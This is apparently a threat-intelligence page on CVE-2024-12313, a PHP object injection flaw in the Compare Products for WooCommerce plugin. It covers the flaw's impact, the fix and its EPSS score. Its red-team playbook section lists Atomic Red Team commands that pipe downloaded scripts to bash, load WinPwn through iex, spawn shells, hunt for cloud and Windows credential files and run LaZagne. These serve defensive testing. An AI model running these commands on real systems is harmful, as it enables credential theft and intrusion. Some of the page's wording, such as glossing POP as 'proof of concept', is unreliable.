CVE-2024-12313
Overview
This vulnerability is a PHP Object Injection caused by insecure deserialization of untrusted data. The root cause lies in the Compare Products for WooCommerce plugin's handling of the 'woo_compare_list' cookie, which is deserialized without proper validation. The affected component is the deserialization logic within the WooCommerce Compare Products plugin versions up to and including 3.2.1.
Vulnerability Description
The Compare Products for WooCommerce plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.2.1 via deserialization of untrusted input from the 'woo_compare_list' cookie. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.
Impact
An unauthenticated remote attacker can exploit this vulnerability by sending a malicious 'woo_compare_list' cookie, potentially leading to arbitrary file deletion, sensitive data exposure, or remote code execution if a suitable POP chain exists in the environment. This attack requires no user interaction and no privileges (AV:N/AC:H/PR:N/UI:N), but the attacker must bypass the high attack complexity due to the need for a compatible POP chain. The business impact includes data compromise, service disruption, and potential full system compromise.
Solution
Upgrade the Compare Products for WooCommerce plugin to a version later than 3.2.1 where the deserialization flaw is addressed. Refer to the Wordfence advisory (https://www.wordfence.com/threat-intel/vulnerabilities/id/638e8e67-38b3-4fc4-bd77-8f268030a93a?source=cve) for detailed patch instructions. No official workaround is documented; therefore, updating the plugin is the recommended remediation step.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the Compare Products for WooCommerce plugin for WordPress arises from improper handling of user input, specifically through the deserialization of untrusted data from the 'woo_compare_list' cookie. This flaw allows an attacker to inject a PHP object into the application, potentially leading to various forms of exploitation. The core issue lies in the fact that the plugin does not adequately validate or sanitize the input it receives, which is a common oversight in many web applications. When an attacker crafts a malicious cookie and sends it to the server, the application may unwittingly process this data, resulting in the execution of unintended PHP code.
Exploitation of this vulnerability can occur through several attack vectors. An unauthenticated attacker can leverage the deserialization flaw by manipulating the 'woo_compare_list' cookie to include a crafted payload. While the vulnerable software itself does not provide a direct path to a "proof of concept" (POP) chain, the presence of additional plugins or themes that may have their own vulnerabilities can create a chain reaction. For instance, if an attacker successfully injects a PHP object that interacts with another vulnerable component, they could escalate their access to perform actions such as deleting arbitrary files, retrieving sensitive information, or executing arbitrary code on the server. This flexibility in exploitation makes the vulnerability particularly concerning, as it can be tailored to the specific environment of the target.
The real-world impact of this vulnerability can be significant, especially for e-commerce businesses relying on the WooCommerce platform. A successful attack could lead to data breaches, loss of customer trust, and potential financial losses. The ability to delete files or execute code could disrupt business operations, leading to downtime and recovery costs. Furthermore, if sensitive customer data is accessed or exfiltrated, the business could face legal repercussions, regulatory fines, and damage to its reputation. The combination of these factors underscores the importance of addressing such vulnerabilities promptly to mitigate business risk.
To detect and mitigate this vulnerability, organizations should adopt a multi-faceted approach. First, regular security audits and code reviews of plugins and themes should be conducted to identify and remediate vulnerabilities. Implementing web application firewalls (WAF) can help filter out malicious requests before they reach the application layer. Additionally, organizations should ensure that all components of their WordPress installation, including the core, plugins, and themes, are kept up to date with the latest security patches. Educating developers on secure coding practices, particularly regarding input validation and sanitization, is also crucial in preventing similar vulnerabilities from being introduced in the future.
In conclusion, the vulnerability present in the Compare Products for WooCommerce plugin represents a serious threat to WordPress-based e-commerce sites. The potential for exploitation through PHP object injection highlights the need for robust security measures and proactive risk management strategies. By understanding the technical details, attack vectors, and real-world implications of such vulnerabilities, organizations can better prepare themselves to defend against potential threats and safeguard their digital assets.
Recent updates to the CVSS and EPSS scores for CVE-2024-12313 indicate a marked reassessment of the vulnerability’s exploitability and potential impact. CSURFACE threat intelligence has identified a significant upward revision in the CVSS base score from zero to 8.1, reflecting a recognition of the vulnerability’s high severity due to unauthenticated PHP object injection risks via the ‘woo_compare_list’ cookie. Concurrently, the EPSS score has doubled, accompanied by a rapid and sustained upward trend in exploit probability as indicated by our telemetry. This shift suggests growing confidence within the threat landscape that exploitation is feasible, particularly if an attacker can leverage additional plugins or themes to establish a POP chain. Although no new proof-of-concept exploits or active exploitation campaigns have been detected, the increasing EPSS score signals a rising likelihood of future exploitation attempts. For defenders, this evolution underscores an elevated threat level and necessitates heightened vigilance in monitoring affected environments. The updated risk profile reflects a transition from a theoretical vulnerability to one with tangible exploitation potential, thereby increasing the urgency for risk management and detection capabilities focused on this plugin’s attack surface.
Update 2 — June 13, 2026
CSURFACE threat intelligence has observed a measurable increase in the Exploit Prediction Scoring System (EPSS) for CVE-2024-12313, reflecting a growing probability of exploitation despite the absence of new proof-of-concept exploits or active attack campaigns. This upward adjustment in EPSS, now approaching the 93rd percentile, indicates that threat actors may be intensifying reconnaissance or preparatory activities targeting the Compare Products for WooCommerce plugin. The heightened score suggests that exploitation attempts could become more frequent or sophisticated, particularly in environments where additional plugins or themes enable a viable PHP Object Injection POP chain. For defenders, this shift elevates the urgency to monitor for anomalous deserialization behaviors and cookie manipulation indicative of exploitation attempts. The risk profile has thus transitioned from a primarily theoretical concern to a more imminent threat, warranting increased attention to detection and response capabilities focused on this vulnerability’s attack vector.
Affected Products
No CPE information available.
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-586 | Object Injection |
63%
|
Medium | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (7)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-12313 |
| wordfence.com |
GitHub CVE
|
https://www.wordfence.com/threat-intel/vulnerabilities/id/638e8e67-38b3-4fc4-bd77-8f268030a93a?source=cve |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/browser/woocommerce-compare-products/trunk/classes/class-wc-compare-functions.php#L219 |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/browser/woocommerce-compare-products/trunk/classes/class-wc-compare-functions.php#L237 |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/browser/woocommerce-compare-products/trunk/classes/class-wc-compare-functions.php#L256 |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/browser/woocommerce-compare-products/trunk/classes/class-wc-compare-functions.php#L275 |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/changeset/3215166/ |